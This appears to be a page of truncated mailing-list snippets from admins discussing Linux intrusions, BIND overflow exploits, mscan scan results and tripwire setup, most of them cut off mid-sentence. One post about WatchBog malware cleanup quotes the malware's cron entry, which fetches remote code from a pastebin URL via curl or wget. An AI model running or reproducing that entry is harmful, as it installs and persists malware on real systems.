similar to: Named Overflow Concern - SUMMARY (fwd)

Woops... this didn't show up here but it did on BugTraq. Questions answered! -- Chuck Mead, CTO, MoonGroup Consulting, Inc. <http://moongroup.com> Mail problems? Send "s-u-b-s-c-r-i-b-e mailhelp" (no quotes and no hyphens) in the body of a message to mailhelp-request@moongroup.com. Public key available at: wwwkeys.us.pgp.net ----------

I am running Linux 2.0.30 (Redhat 4.2) and have recently been hacked. I have tightened up security but still feel vulnerable. In running the program mscan which was kindly left on my system I get this. bullnet.co.uk: VULN: linux box vulnerable to named overflow. 194.242.135.145: VULN: redhat linux box running imapd. This is after upgrading to the versions as below. bind-4_9_7-0

We just had a security application vendor come in. We asked about Linux support and he said that putting a security application on top of an insecure OS was useless. When I asked what he meant by insecure he replied that Linux does not have a true Auditing capability - as opposed to HP-UX & Solaris which they do support. Can anyone explain to me what he was talking about? Thanks, Marty

Someone I was speaking with this evening claimed they have installed the latest named rpms yet they are still getting exploited daily and being hacked. Do the latest rpm''s for the named 4.9.x stuff fix all the root exploits or is this person just an idiot who probably has holes elsewhere in the system?

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

I''m getting 2 or three of these a day...Any ideas ? The 192.168.250.zz is a eth0:3 on a box that currently only has eth0:1 active Dec 1 15:47:40 machine-name kernel: Shorewall:all2all:REJECT:IN= OUT=eth0 SRC=my.real.ip.addr DST=66.228.216.22 LEN=68 TOS=0x00 PREC=0xC0 TTL=255 ID=12031 PROTO=ICMP TYPE=3 CODE=1 [SRC=66.228.216.22 DST=192.168.250.zz LEN=40 TOS=0x00 PREC=0x00 TTL=46

Hello, I'm trying to run mscan meteo pro v2.0 under wine on linux mint 12. I'm getting the below error. Anyone offer any suggestions? $ winedbg mscan.exe > WineDbg starting on pid 0023 > fixme:event:wait_for_withdrawn_state window 0x2003a/3200001 wait timed out > 0x7b85af43: movl %edi,0x4(%esp) > Wine-dbg> > thanks, John

I am not sure if I had a compromise but I am not sure I wanted some other input. I noticed in this in my daily security run output: pc1 setuid diffs: 19c19 < 365635 -rwsr-xr-x 1 root wheel 204232 Sep 27 21:23:19 2003 /usr/X11R6/bin/xscreensaver --- > 365781 -rwsr-xr-x 1 root wheel 205320 Dec 4 07:55:59 2003 /usr/X11R6/bin/xscreensaver It was the only file listed and I didn't

There is a lot of talk about the vulnerable Linux kernel. I'm simply wondering the telltale signs if a given system has been hacked? What, specifically, does a person look for? Thanks. Scott

Hello all, Years ago, I used to work with tripwire for system monitoring. Last time I checked with "yum search tripwire", there is no hit. IIRC, it used to be packed by default on older Redhat distros. Any suggestion for an alternative of tripwire for my CentOS 5.6? Cheers, -- ********************************************************************** Viet Nhat General Joint Stock

I''d like to hear some suggestions about securely administering a system remotely. Here''s the application: a project is going to scatter some server machines around the US. The server machines will be running Linux, with the only network servers being a custom application. Ignoring the separate question of physical security, how can I remotely check the system''s

Does anybody use tripwire on centos 5? Has anybody checked that: http://www.linickx.com/archives/281/tripwire-2411-rpm-for-centos-redhat-rhel-4 on centos5? M. -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. -------------- next part -------------- An HTML attachment was scrubbed... URL:

[mod: Just to show you that people DO get bitten after a bugwarning has gone out on linux-security..... -- REW] -----BEGIN PGP SIGNED MESSAGE----- Content-Type: text/plain; charset=us-ascii Has anyone been hit with the Bind Inverse Query Buffer Overrun on their Linux servers? We have had 3 servers attacked using this expoit and all of the machines had several binaries replaced with trojan

As halflife demonstrated in Phrack 50 with his linspy project, it is trivial to patch any system call under Linux from within a module. This means that once your system has been compromised at the root level, it is possible for an intruder to hide completely _without_ modifying any binaries or leaving any visible backdoors behind. Because such tools are likely to be in use within the hacker

I am trying to write a module for tripwire. I need to push out the twcfg.txt and twpol.txt files only if the tw.cfg and tw.pol files do not currently exist. How can do I this with File{}? I''m can''t seem to find a way to do it. In general times, how can you deploy file A only when file B does not exist? And... tripwire... what a mess. I am trying to use push out the site key,

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

Hi all, I have two prodction servers with FreeBSD 5.4 (all security patches are applied). They running some services like dns, ssh, http, ftp, etc. But I woukd like to encrypt some services for some hosts with ipsec when it is accessed. For example: - DNS resolution: not encrypted. - DNS replication master-slave: encrypted by ipsec. - Telnet: encrypted by ipsec for some hosts. Deny

I'm trying to run tripwire on a RHEL 5.4 box. I'm new to it. I'm getting errors: The object: "/ora" is on a different file system...ignoring. For one thing, it's not a different file system. It's not any different than the root partition, that tripwire will monitor. And I want tripwire to monitor it. I've been googling around, and have seen this error in

Hi, I'm running some databases's software on a CentOS 4.5 server and I'd like to know if there are any audit software in CentOS4.5 CDs packages?.....I need some software to audit all the files on the server, I mean, if some one delete a file, or change some permissions on any filesystems, if someone copy files to my server and some of this stuff... take in mind I'm not lookign for

Hi, I literally have about 36 machines running CentOS on a private network, and will probably change the remaining 30 or so away from Whitebox or RH in the near term. One thing I just noticed was when I tried to search out Tripwire RPM's, that none seemed evident. Can anyone point me in the direction of an Tripwire RPM that works with CentOS 4.3, or advise me on how to create one from the